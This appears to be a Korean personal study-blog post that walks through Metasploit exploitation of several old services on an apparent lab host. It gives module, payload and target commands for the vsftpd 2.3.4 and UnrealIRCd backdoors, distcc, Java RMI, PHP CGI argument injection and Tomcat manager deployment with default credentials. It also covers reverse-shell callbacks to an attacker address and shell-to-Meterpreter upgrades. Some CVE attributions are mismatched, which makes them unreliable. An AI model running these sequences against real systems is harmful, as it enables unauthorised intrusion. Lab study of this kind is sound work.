Information Security 정보보안/System Security 시스템 보안

System Security DAY_018 CVE , OSVDB , vsftpd_234 Backdoor , distcc_exec , Java RMI , php_cgi_arg_injection , unreal_ircd_3281_backdoor , meterpreter 공격 , Metaploit , 시스템 보안 , 시스템 해킹

사리머스 2024. 1. 6. 17:27
728x90

배울내용 :

CVE

OSVDB

vsftpd_234 Backdoor

distcc_exec 

 Java RMI

php_cgi_arg_injection 

unreal_ircd_3281_backdoor 

meterpreter 공격   

Metaploit  

시스템 보안

시스템 해킹 

 

 

 

 

 

 

 

 

제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.

틀린게 있으면 댓글로 써주시면 고치겠습니다.

 

 

 

오늘은 취약점 몇가지 알아볼것이다 오늘알아보는것들은

인간의 몸의 부위로 비교하면 발톱 때 정도만 알아본다고 보면될것같다 

그만큼 취약점이 많다 

 

 

 

오늘은   침투 테스팅에 자주 사용되는 오픈 소스 도구인 Metasploit  를 사용할것이다

 

취약점 1 

[ 취약점 : vsftpd_234 Backdoor ]

>CVE-2011-2523

>OSVDB- 73573 

 

 

vsftpd 2.3.4 서버에 존재하는 특정 백도어 취약점(CVE-2011-2523) 

 

 

 

CVE 란? 

CVE-2011-2523OSVDB-73573: 이들은 vsftpd 2.3.4에서 발견된 보안 취약점을 식별하는 고유 식별자이다

 

CVE (Common Vulnerabilities and Exposures)는 공개적으로 알려진 보안 취약점과 노출을 식별하기 위한 표준

OSVDB (Open Source Vulnerability Database)는 취약점에 대한 정보를 제공하는 데이터베이스

 

 

 

 

 

 

미스포춘(metaexploit)  불러내서 

 

 

 

 

 

 

ㅋㅋ 이번엔 황소가 당첨됬다  

 

 

use /exploit/unix/ftp/vsftpd_234_backdoor

 

Metasploit에서 vsftpd 2.3.4 백도어 취약점을 공격하기 위한 모듈을 선택하고 

 

set payload cmd/unix/interact

 

공격 후 사용할 페이로드를 설정

 

set rhosts 192.168.10.247

 

공격 대상의 IP 주소를 설정

 

exploit

 

 설정된 옵션으로 공격을 시작

 

 

 

이걸 이전에 미스포춘이 포탄 선택하고(use explo...)

포탄 장전하고(set payload)

상대방을 향해 조준하고 (set rhost.....)

발사 (공격 exploit )

한다고 이해하기 쉽게 설명했었다 

 

 

 

 

 

 

그러면 exploitable2 Linux 서버는 리눅스이기에 2번 공격해야한다

 

 

 

ctrl + Z 한뒤에 y 해주고 

use post/multi/manage/shell_to_meterpreter 

 

sessions 해보면 

ID 나온다 그걸 set session 1 해준뒤에 

 

exploit 

공격해준다

 

 

 

 

 

 

 

그러면 meterpreter type의 session 이 열리는데 이걸 

session -i 2 로 연결하면 

 

 

 

 

 

 

 

공격이 성공된걸 볼수있다 

 

 

 

 

 

취약점 2 


[ 취약점 : distcc_exec ]

>CVE- 2004-2687
>OSVDB -13378

 


> use exploit/unix/misc/distcc_exec
> set payload cmd/unix/bind_ruby
> set rhosts 192.168.10.247
> exploit

 

경로만 조금 틀리뿐  하는방식은 거이 비슷하다 

 

공격후에 다시 
Ctrl+Z = y 해주고 


sessions -i 하면 3번째꺼가 생김 

 

 

공격 성공 후의 상호작용:

  • w, whoami: 공격이 성공한 후, 공격자는 시스템에서 현재 로그인한 사용자와 실행 중인 프로세스를 확인 
  • whoami 명령의 결과 daemon이 나오면, 공격자는 시스템의 daemon 사용자 권한을 얻은 것 
  • Ctrl+Z, sessions -i: 공격자는 세션을 백그라운드로 전환하고, sessions -i 명령으로 활성 세션의 목록을 확인 

 

 

 

 


이제 2차공격
use post/multi/manage/shell_to_meterpreter 
set session 3 
exploit 하면 2차공격으로 하면 type 이 meterpreter 인 걸로 연결되고 

아까처럼 sysinfo 같은것도 가능하다 

 

 

2차 공격 - Shell을 Meterpreter로 전환:

  • use post/multi/manage/shell_to_meterpreter: 이 명령은 기존의 단순 쉘을 Meterpreter 세션으로 전환하는 post-exploitation 모듈선택
  • set session 2: 이미 취득한 세션 (여기서는 세션 번호 2)을 대상으로 설정
  • 이 과정을 통해 공격자는 더 강력하고 유연한 Meterpreter 세션을 얻어, 대상 시스템에서 추가적인 공격이나 탐색을 수행할 수 있다

 

 

 

 

03. 취약점

[  취약점 : Java RMI (Remote Method Invocation ) ]

> CVE- 2020-5327

 

이거는 최근에 확인된 취약점이라 요즘에써도 쓸수있을만한 공격이다 

그리고 다른 공격과 다르게 2차공격이 필요없이 1 차로만 공격해도 된다 

 

 

 

use exploit/multi/misc/java_rmi_server 

set payload java/meterpreter/reverse_tcp

set rport 1099

set lhosts 192.168.10.100

set lport 4444

exploit 

 

하면 meterpreter 로 바로 연결되는걸 알수있다 

 

 

04 . 취약점

[  취약점 : php_cgi_arg_injection ]
>CVE- 2012-1823

 이 취약점은 PHP가 "="(등호) 문자가 없는 쿼리 문자열을 제대로 처리하지 못하기 때문에 발생한다.

결과적으로, 원격 공격자는 쿼리 문자열에 명령줄 옵션을 넣어 임의의 코드를 실행할 수 있다.

 

이건 2가지 방식이있는데 1번 방식이 1번에 되고 

2번쨰 방식이 2번 공격해야한다 

필자는 번거러운 공격은 싫으니 1번째만 하면 이렇게 된다 

 

use exploit/multi/http/php_cgi_arg_injection

set payload php/meterpreter/reverse_tcp

set rhosts 192.168.10.247

exploit 

 

 

 

 

 

 

 

05. 취약점

[ 취약점 : Tomcat  vulnerability ]

> CVE-2023-28708

RemoteIpFilter를 사용할 때 발생하는 정보 유출 문제

이 취약점은 웹 애플리케이션이 업로드된 파일에 대한 스트림을 열었지만

닫지 않을 경우 윈도우 시스템에서 서비스 거부(DoS)를 일으킬 수 있다

 

이것또한 2023 으로 되어있는걸로보아 최신에 발견된 공격인것같아

이것도 어느 PC에서는 공격이 될수도있다 

 

 

use exploit/multi/http/tomcat_mgr_deploy

set httpusername tomcat

set httppassword tomcat

set rport 8180

options

set rhosts 192.168.10.247

exploit 

 

payload가 default 가되있어서 위와같이 했지만 

안되면 set payload java/shell/reverse_tcp 해준다

 

 

 

06. 취약점
[ unreal_ircd_3281_backdoor ] >CVE - 2009?...? 

 

취약점은 UnrealIRCd라는 오픈 소스 인터넷 릴레이 채팅(IRC) 서버 소프트웨어의 특정 버전에서 발견된 보안 결함

이 취약점은 2009년 11월부터 2010년 6월 12일까지 특정 미러 사이트를 통해 배포된

Unreal IRCd 3.2.8.1 다운로드 아카이브에 추가된 악의적인 백도어다.

 

 

 


use exploit/unix/irc/unreal_ircd_3281_backdoor
  set payload cmd/unix/bind_ruby
 set rhost 192.168.10.247
  exploit

ctrl z -> y 

 

(2차공격)

use post/multi/manage/shell_to_meterpreter
set session 1
exploit

 

이렇게 하면된다 . 

 

 

 

 

 

 

이렇게 한참 많은 범위지만 그래도 중요한 Key 같은것들을 System 보안에서 공부해봤다

향후 더 공부해서 올려보고 하고 당분간은 다른 보안 쪽을 포스팅 하도록 해보겠다 

 

 

 

정보보안 보안 전문가가 되기까지 오늘도 화이팅

그럼 20000

728x90